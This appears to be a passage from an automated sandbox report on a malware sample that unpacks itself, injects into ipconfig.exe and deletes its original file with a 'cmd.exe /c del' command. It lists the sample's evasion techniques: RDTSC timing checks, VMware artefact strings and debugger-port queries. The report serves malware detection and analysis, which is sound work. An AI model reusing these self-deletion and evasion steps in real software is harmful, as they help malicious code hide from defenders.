          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeProcess created: C:\Users\user\Desktop\v8kZUFgdD4.exe 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: Binary string: ipconfig.pdb source: v8kZUFgdD4.exe, 00000001.00000002.389856707.0000000000A20000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: v8kZUFgdD4.exe, 00000001.00000002.389856707.0000000000A20000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.363215324.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: v8kZUFgdD4.exe, 00000000.00000003.338578386.0000000002500000.00000004.00000001.sdmp, v8kZUFgdD4.exe, 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, ipconfig.exe, 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: v8kZUFgdD4.exe, ipconfig.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.363215324.000000000DC20000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeUnpacked PE file: 1.2.v8kZUFgdD4.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 0_2_00403DDB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_004062F6 pushfd ; ret
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_0041B3C5 push eax; ret
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_004153FC push eax; retf
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_0041B47C push eax; ret
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_0041B412 push eax; ret
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_0041B41B push eax; ret
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00415CE7 pushad ; ret
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_0041C4EE push 133511A3h; retf
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00414D71 push ss; iretd
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00415D38 pushad ; ret
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AAD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0360D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EA62F6 pushfd ; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EB53FC push eax; retf
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EBB3C5 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EBC4EE push 133511A3h; retf
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EB5CE7 pushad ; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EBB47C push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EBB41B push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EBB412 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EB4D71 push ss; iretd
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EB5D38 pushad ; ret

          Persistence and Installation Behavior:

          barindex
          Uses ipconfig to lookup or modify the Windows network settingsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000000EA85F4 second address: 0000000000EA85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000000EA898E second address: 0000000000EA8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_004088C0 rdtsc
          Source: C:\Windows\explorer.exe TID: 1536Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6904Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: explorer.exe, 00000005.00000000.359549772.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.359510454.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000000.359944939.000000000868E000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.379240198.00000000045BE000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.355349933.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.354289488.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.359510454.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.355349933.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.359378220.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.354289488.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.354289488.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.359378220.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.359549772.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000005.00000000.343561590.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000005.00000000.354289488.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 0_2_00403DDB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 0_2_021C06DA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 0_2_021C0A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 0_2_021C09DE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 0_2_021C099F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 0_2_021C08EE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A990AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A59080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AD3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AD3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A558EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AEB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00B24015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00B24015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00B12073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00B21074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A70050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A70050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AD69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A7C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A82990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A5B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A5B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A5B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AE41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A74120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A59100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A59100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A59100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A5C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A5B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A5B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A7B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A7B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A6AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A6AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A82AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A82ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A94A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A94A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A68A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A5AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A5AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A55210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A55210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A55210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A55210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A73A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03688F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03688B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0368070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0368070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0367131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03685BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0366D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0367138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03637794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03637794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03637794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0366B260 mov eax, dword ptr fs:[00000030h]
